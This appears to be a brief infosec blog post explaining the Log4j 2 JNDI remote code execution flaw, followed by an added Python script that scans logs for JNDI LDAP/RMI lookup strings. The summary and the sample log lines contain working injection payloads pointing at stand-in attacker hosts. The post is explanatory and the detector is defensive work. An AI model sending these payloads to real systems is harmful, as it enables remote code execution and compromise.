Az

infosec

Log4j Learnings

Sat, Dec 25, 2021 | 800 Words

A few weeks ago a new vulnerability was discovered being exploited in the wild.

Vulnerability Summary

The Apache Log4j 2 library has a Remote Code Execution (RCE) vulnerability based on variable substitution. If a log message contains a JNDI lookup string pointing to an LDAP or RMI endpoint, such as ${jndi:ldap://evil-ldap.example.com/mwahaha}, the Log4j library will immediately try to resolve it by calling out to the endpoint. In the LDAP case it will resolve the LDAP resource, and if the LDAP server replies with an HTTP address it will call out to that as well.
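A defender-side illustration of the lookup string described above, as an added example that is not from the original post: it scans log lines for the literal ${jndi:ldap://...} or ${jndi:rmi://...} form and groups the endpoints they point to, so those hosts can be checked against egress logs. The log lines, the 203.0.113.7 address and the function names are constructed for illustration.

```python
import re
from collections import defaultdict

# Literal JNDI lookup with an LDAP or RMI endpoint, in the form quoted in the post.
JNDI_RE = re.compile(
    r"\$\{jndi:(?P<scheme>ldap|rmi)://(?P<host>[^/:}\s]+)"
    r"(?::(?P<port>\d+))?(?P<path>/[^}\s]*)?\}",
    re.IGNORECASE,
)

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = """\
2021-12-11T09:14:02Z INFO  web - GET /login ua="Mozilla/5.0"
2021-12-11T09:14:07Z INFO  web - GET / ua="${jndi:ldap://evil-ldap.example.com/mwahaha}"
2021-12-11T09:15:31Z WARN  auth - failed login user="${jndi:rmi://203.0.113.7:1099/obj}"
2021-12-11T09:16:00Z INFO  web - GET /docs/jndi-ldap-howto ua="curl/7.79"
2021-12-11T09:17:45Z INFO  web - GET /search?q=${jndi:LDAP://evil-ldap.example.com:1389/a} ua="x"
"""


def find_jndi_lookups(log_text):
    """Return one finding per JNDI lookup: log line number, scheme, host, port."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        for m in JNDI_RE.finditer(line):
            findings.append({
                "line": lineno,
                "scheme": m.group("scheme").lower(),
                "host": m.group("host").lower(),
                "port": int(m.group("port")) if m.group("port") else None,
            })
    return findings


def endpoints_by_host(findings):
    """Group findings by the endpoint host, for egress-log review or blocking."""
    hosts = defaultdict(list)
    for f in findings:
        hosts[f["host"]].append(f["line"])
    return dict(hosts)


if __name__ == "__main__":
    for host, lines in endpoints_by_host(find_jndi_lookups(SAMPLE_LOG)).items():
        print(f"{host}: seen on log lines {lines}")
```

A hit means the string reached the log, not that the lookup was resolved; outbound LDAP, RMI or HTTP connections from the logging host to the listed endpoints are what confirm the call-out described above.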